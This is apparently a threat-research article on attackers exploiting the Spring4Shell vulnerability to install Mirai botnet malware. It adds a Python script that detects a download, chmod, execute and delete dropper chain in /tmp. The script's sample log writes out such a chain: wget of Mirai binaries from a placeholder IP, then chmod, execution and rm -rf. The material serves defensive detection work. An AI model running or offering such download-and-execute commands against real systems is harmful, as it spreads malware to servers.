Researchers at Trend Micro Threat Research have observed active exploitation of the Spring4Shell vulnerability to deliver and execute Mirai botnet malware. Spring4Shell (CVE-2022-22965) is a recently disclosed remote code execution vulnerability in the Spring Framework, a widely used Java application framework. You can find our previous coverage of this vulnerability here.
Trend Micro researchers observed this adaptation of the Mirai botnet in early April in the Singapore region. Exploiting the Spring Framework vulnerability gave the Mirai operators command execution on the vulnerable server, which they used to run a shell script that retrieves their malware from their own infrastructure with ‘wget’, saves the executable into the ‘/tmp’ folder, makes it executable with ‘chmod’, and runs it. Several CPU architecture variants were also observed on the malware file server, including ARM, x86, and MIPS among others. Interestingly, the script does not try to identify the victim’s architecture first: it downloads every available variant and attempts to run each one. Only the variant built for the host’s architecture actually executes; the others fail at launch because the kernel refuses to run an ELF binary compiled for a foreign architecture (the familiar ‘Exec format error’). All of the downloaded files are then deleted after the execution attempts. For defenders, this download-all-and-spray behaviour is itself a useful signal: a single session that fetches several binaries into ‘/tmp’, marks them executable, launches each of them, and then removes them is rarely legitimate.
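One way to turn the dropper chain described above into detection logic, as an added example that is not part of the original article or of any Trend Micro tooling: the script below walks process-creation log lines (constructed sample data in a simplified ‘pid ppid cmdline’ format, with a documentation-range IP and made-up file names) and flags any parent process whose children download files into a staging directory such as ‘/tmp’, chmod them, execute them, and remove them. It assumes the log records the explicit output path of wget (‘-O’) or curl (‘-o’); a dropper that relies on ‘cd /tmp’ followed by a bare ‘wget URL’ would need the working directory from the log source, which this example does not model.

```python
"""Detect a wget -> chmod -> execute -> rm dropper chain in /tmp.

Added example for the Spring4Shell/Mirai write-up; not the article's own code.
Input is a constructed process-creation log: one process per line,
"<pid> <ppid> <cmdline>". Sessions are grouped by parent pid.
"""
import shlex
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample log. 198.51.100.0/24 is a documentation range and the
# file names are invented; they are not indicators from the article.
SAMPLE_LOG = """\
1201 1100 wget http://198.51.100.7/bins/mirai.arm -O /tmp/mirai.arm
1202 1100 wget http://198.51.100.7/bins/mirai.x86 -O /tmp/mirai.x86
1203 1100 wget http://198.51.100.7/bins/mirai.mips -O /tmp/mirai.mips
1204 1100 chmod 777 /tmp/mirai.arm /tmp/mirai.x86 /tmp/mirai.mips
1205 1100 /tmp/mirai.arm
1206 1100 /tmp/mirai.x86
1207 1100 /tmp/mirai.mips
1208 1100 rm -rf /tmp/mirai.arm /tmp/mirai.x86 /tmp/mirai.mips
1300 1250 wget https://example.org/index.html -O /tmp/index.html
1301 1250 cat /tmp/index.html
"""

# Directories that are world-writable on most Linux hosts and commonly used
# for staging payloads.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def download_target(argv):
    """Return the local path a wget/curl invocation writes to, or None.

    wget uses -O/--output-document; curl uses -o/--output (curl's -O means
    "remote file name", so the two tools are handled separately).
    """
    prog = argv[0].rsplit("/", 1)[-1]
    flags = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}.get(prog)
    if not flags:
        return None
    short, long_ = flags
    for i, arg in enumerate(argv[1:], 1):
        if arg == short and i + 1 < len(argv):
            return argv[i + 1]
        if arg.startswith(long_ + "="):
            return arg.split("=", 1)[1]
    return None


@dataclass
class Session:
    downloaded: set = field(default_factory=set)  # staged paths fetched
    chmodded: set = field(default_factory=set)    # staged paths made executable
    executed: list = field(default_factory=list)  # staged paths launched after chmod
    removed: set = field(default_factory=set)     # staged paths deleted afterwards


def analyze(log_text):
    """Track the dropper stages per parent pid, in the order they occur."""
    sessions = defaultdict(Session)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _pid, ppid, cmdline = line.split(" ", 2)
        try:
            argv = shlex.split(cmdline)
        except ValueError:  # unbalanced quotes in a hostile command line
            continue
        if not argv:
            continue
        s = sessions[ppid]
        prog = argv[0].rsplit("/", 1)[-1]
        target = download_target(argv)
        if target and target.startswith(STAGING_DIRS):
            s.downloaded.add(target)
        elif prog == "chmod":
            s.chmodded.update(a for a in argv[1:] if a in s.downloaded)
        elif prog in ("rm", "unlink"):
            s.removed.update(a for a in argv[1:] if a in s.downloaded)
        elif argv[0] in s.chmodded:  # launched only after it was made executable
            s.executed.append(argv[0])
    return sessions


def find_droppers(log_text, min_binaries=1):
    """Return one finding per session that completed download->chmod->exec."""
    findings = []
    for ppid, s in analyze(log_text).items():
        ran = sorted(set(s.executed))
        if len(ran) >= min_binaries:
            findings.append({
                "session": ppid,
                "binaries": ran,
                # Several distinct staged binaries launched in one session is
                # the multi-architecture spray described in the article.
                "multi_arch_spray": len(ran) > 1,
                "cleanup": all(p in s.removed for p in ran),
            })
    return findings


if __name__ == "__main__":
    for finding in find_droppers(SAMPLE_LOG):
        print(finding)
```

Session 1100 in the sample is reported with three launched binaries, the multi-architecture flag set and cleanup observed; the parent that merely fetched a web page into /tmp and read it is not reported, because nothing in that session was made executable and launched. Raising min_binaries to 2 restricts the rule to the spray pattern alone, at the cost of missing a dropper that fetches a single correctly chosen variant.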